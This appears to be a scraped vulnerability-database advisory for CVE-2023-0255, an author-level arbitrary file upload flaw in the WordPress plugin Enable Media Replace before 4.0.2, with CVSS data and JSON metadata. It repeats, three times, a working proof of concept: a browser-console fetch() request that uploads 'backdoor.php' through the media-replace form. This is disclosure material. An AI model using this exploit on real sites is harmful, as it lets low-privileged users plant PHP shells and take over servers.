Description
The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.
### PoC
1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php 2) Press on the new picture's thumbnail to see the attachment's details 3) Click on "Upload a new file", next to "Replace media" 4) Paste the following in your browser's developer console: ``` await fetch(document.forms[0].action, { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Content-Type": "multipart/form-data; boundary=---------------------------294159958331225347843177109147", "Upgrade-Insecure-Requests": "1" }, "body": `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"ID\"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"backdoor.php\"\r\nContent-Type: text/php\r\n\r\n
Affected Software
Related
{"id": "WPVDB-ID:B0239208-1E23-4774-9B8C-9611704A07A0", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload", "description": "The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.\n\n### PoC\n\n1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php 2) Press on the new picture's thumbnail to see the attachment's details 3) Click on \"Upload a new file\", next to \"Replace media\" 4) Paste the following in your browser's developer console: ``` await fetch(document.forms[0].action, { \"credentials\": \"include\", \"headers\": { \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-CA,en-US;q=0.7,en;q=0.3\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------294159958331225347843177109147\", \"Upgrade-Insecure-Requests\": \"1\" }, \"body\": `-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"ID\\\"\\r\\n\\r\\n${document.forms[0].action.match(/attachment_id=(\\d+)/)[1]}\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"userfile\\\"; filename=\\\"backdoor.php\\\"\\r\\nContent-Type: text/php\\r\\n\\r\\n\n", "published": "2023-01-17T00:00:00", "modified": "2023-01-17T20:52:27", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://wpscan.com/vulnerability/b0239208-1e23-4774-9b8c-9611704a07a0", "reporter": "dc11", "references": [], "cvelist": ["CVE-2023-0255"], "immutableFields": [], "lastseen": "2023-02-15T20:12:25", "viewCount": 1, "enchantments": {"score": {"value": 2.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2023-0255"]}, {"type": "wpexploit", "idList": ["WPEX-ID:B0239208-1E23-4774-9B8C-9611704A07A0"]}]}, "affected_software": {"major_version": [{"name": "enable-media-replace", "version": 4}]}, "epss": [{"cve": "CVE-2023-0255", "epss": "0.000500000", "percentile": "0.169030000", "modified": "2023-03-20"}], "vulnersScore": 2.3}, "_state": {"score": 1676494040, "dependencies": 1676492161, "affected_software_major_version": 1677387694, "epss": 1679355295}, "_internal": {"score_hash": "eaa21fd77c165dc46b293c8b4d1efe38"}, "affectedSoftware": [{"version": "4.0.2", "operator": "lt", "name": "enable-media-replace"}], "exploit": "\r\n1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php\r\n2) Press on the new picture's thumbnail to see the attachment's details\r\n3) Click on \"Upload a new file\", next to \"Replace media\"\r\n4) Paste the following in your browser's developer console:\r\n\r\n```\r\nawait fetch(document.forms[0].action, {\r\n \"credentials\": \"include\",\r\n \"headers\": {\r\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"en-CA,en-US;q=0.7,en;q=0.3\",\r\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------294159958331225347843177109147\",\r\n \"Upgrade-Insecure-Requests\": \"1\"\r\n },\r\n \"body\": `-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"ID\\\"\\r\\n\\r\\n${document.forms[0].action.match(/attachment_id=(\\d+)/)[1]}\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"userfile\\\"; filename=\\\"backdoor.php\\\"\\r\\nContent-Type: text/php\\r\\n\\r\\n<?php phpinfo();\\n\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"remove_bg\\\"\\r\\n\\r\\nyes\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"replace_type\\\"\\r\\n\\r\\nreplace_and_search\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"timestamp_replace\\\"\\r\\n\\r\\n2\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_date\\\"\\r\\n\\r\\nJanuary 12, 2023\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_hour\\\"\\r\\n\\r\\n18\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_minute\\\"\\r\\n\\r\\n41\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_date_formatted\\\"\\r\\n\\r\\n2023-01-12\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"location_dir\\\"\\r\\n\\r\\n2023/01\\r\\n-----------------------------294159958331225347843177109147--\\r\\n`,\r\n \"method\": \"POST\",\r\n \"mode\": \"cors\"\r\n});\r\n```\r\n\r\n5) Check the wp-content/uploads/2023/01 directory for the backdoor.php file.\r\n", "sourceData": "", "generation": 0}
{"cve": [{"lastseen": "2023-02-15T18:01:03", "description": "The Enable Media Replace WordPress plugin before 4.0.2 does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-13T15:15:00", "type": "cve", "title": "CVE-2023-0255", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2023-0255"], "modified": "2023-02-15T16:04:00", "cpe": [], "id": "CVE-2023-0255", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-0255", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "wpexploit": [{"lastseen": "2023-02-15T20:12:25", "description": "The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-17T00:00:00", "type": "wpexploit", "title": "Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2023-0255"], "modified": "2023-01-17T20:52:27", "id": "WPEX-ID:B0239208-1E23-4774-9B8C-9611704A07A0", "href": "", "sourceData": "\r\n1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php\r\n2) Press on the new picture's thumbnail to see the attachment's details\r\n3) Click on \"Upload a new file\", next to \"Replace media\"\r\n4) Paste the following in your browser's developer console:\r\n\r\n```\r\nawait fetch(document.forms[0].action, {\r\n \"credentials\": \"include\",\r\n \"headers\": {\r\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"en-CA,en-US;q=0.7,en;q=0.3\",\r\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------294159958331225347843177109147\",\r\n \"Upgrade-Insecure-Requests\": \"1\"\r\n },\r\n \"body\": `-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"ID\\\"\\r\\n\\r\\n${document.forms[0].action.match(/attachment_id=(\\d+)/)[1]}\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"userfile\\\"; filename=\\\"backdoor.php\\\"\\r\\nContent-Type: text/php\\r\\n\\r\\n<?php phpinfo();\\n\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"remove_bg\\\"\\r\\n\\r\\nyes\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"replace_type\\\"\\r\\n\\r\\nreplace_and_search\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"timestamp_replace\\\"\\r\\n\\r\\n2\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_date\\\"\\r\\n\\r\\nJanuary 12, 2023\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_hour\\\"\\r\\n\\r\\n18\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_minute\\\"\\r\\n\\r\\n41\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"custom_date_formatted\\\"\\r\\n\\r\\n2023-01-12\\r\\n-----------------------------294159958331225347843177109147\\r\\nContent-Disposition: form-data; name=\\\"location_dir\\\"\\r\\n\\r\\n2023/01\\r\\n-----------------------------294159958331225347843177109147--\\r\\n`,\r\n \"method\": \"POST\",\r\n \"mode\": \"cors\"\r\n});\r\n```\r\n\r\n5) Check the wp-content/uploads/2023/01 directory for the backdoor.php file.\r\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}
Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload
